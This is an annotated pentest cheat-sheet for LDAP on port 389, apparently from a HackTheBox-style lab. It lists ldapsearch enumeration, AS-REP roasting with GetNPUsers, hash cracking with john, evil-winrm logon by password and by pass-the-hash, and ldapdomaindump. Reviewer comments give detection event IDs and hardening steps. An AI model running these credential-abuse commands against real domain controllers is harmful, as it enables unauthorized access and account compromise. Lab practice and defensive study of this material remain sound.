# Port 389 - LDAP
#
# Review notes (defender view): every command in this file is an enumeration
# or credential-abuse step against a domain controller. The comments added
# below say what each step depends on, and what to look for or harden.

# LDAPSearch

LdapSearch Naming Context Dump:

# -x selects a simple bind; with no -D/-w this is an ANONYMOUS bind. -s base
# without -b reads the RootDSE, which AD answers anonymously by default, so a
# result here is expected and not itself a misconfiguration.
# NOTE(review): OpenLDAP's -H expects an LDAP URI (ldap://host); a bare
# address is rejected, so this line as written likely errors out.
ldapsearch -H 10.10.10.172 -x -s base namingcontexts

# LdapSearch Big Dump

Need Naming Context to do big dump:

# A subtree dump over an anonymous bind only returns objects when the DC has
# been configured to allow anonymous LDAP reads (off by default in AD). If
# this returns data, that setting is the finding to remediate.
ldapsearch -H {IP} -x -b "{Naming_Context}"
ldapsearch -H {IP} -x -b "DC=htb,DC=local"

# Query users in LDAP

# Same anonymous-read dependency as above; the filter enumerates every
# account object in the domain.
ldapsearch -H 10.10.10.172 -x -b "DC=MEGABANK,DC=LOCAL" '(objectClass=Person)'

# Extract hash >> Crack >> Connect

# Get users hashes
# Impacket GetNPUsers.py obtains AS-REP material only for accounts that have
# "Do not require Kerberos preauthentication" set; the exposure comes from
# that flag, not from a software flaw. Detection: Event ID 4768 with
# Pre-Authentication Type 0. Mitigation: clear the flag, and enforce long
# passwords on any account that must keep it.
python GetNPUsers.py MEGABANK.LOCAL/ -usersfile users.txt -dc-ip 10.10.10.172
python GetNPUsers.py -request MEGABANK.LOCAL/ -dc-ip 10.10.10.172

# Crack the hashes
# Offline step; nothing touches the target, so there is no network detection
# for it. Password length/complexity on the flagged accounts is the control.
john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt

# Connect with Evil-winrm
# WinRM (5985/5986) logon with a plaintext password.
# NOTE(review): the password sits on argv, so it is visible in `ps`, shell
# history and `set -x` traces; a real credential should not be kept in a
# notes file at all. Defender side: this typically appears as a network
# logon (4624, type 3) followed by remote PowerShell activity.
evil-winrm -u mhope -p '4n0therD4y@n0th3r$' -i 10.10.10.172

# Connect using username&hash
# -H authenticates with the account's NTLM hash instead of the password
# (pass-the-hash), so a leaked hash is equivalent to the password until the
# password is changed. Same argv-exposure caveat as above. The hash value
# here is a placeholder, not a real hash.
evil-winrm -u mhope -H 'HASHDKASUDHASKUDWXADYASDASJDH' -i 10.10.10.172

# LDAP Domain Dump

# Authenticated dump (binds as lparker). By default any domain user can read
# most directory attributes, so compromise of one low-privilege account is
# enough for full directory enumeration; that default is the risk to weigh.
# $IP is unquoted — a value containing spaces or glob characters would be
# word-split; "$IP" is the safe form. The -p value is redacted.
ldapdomaindump $IP -u 'fusion.corp\lparker' -p '****************' --no-json --no-grep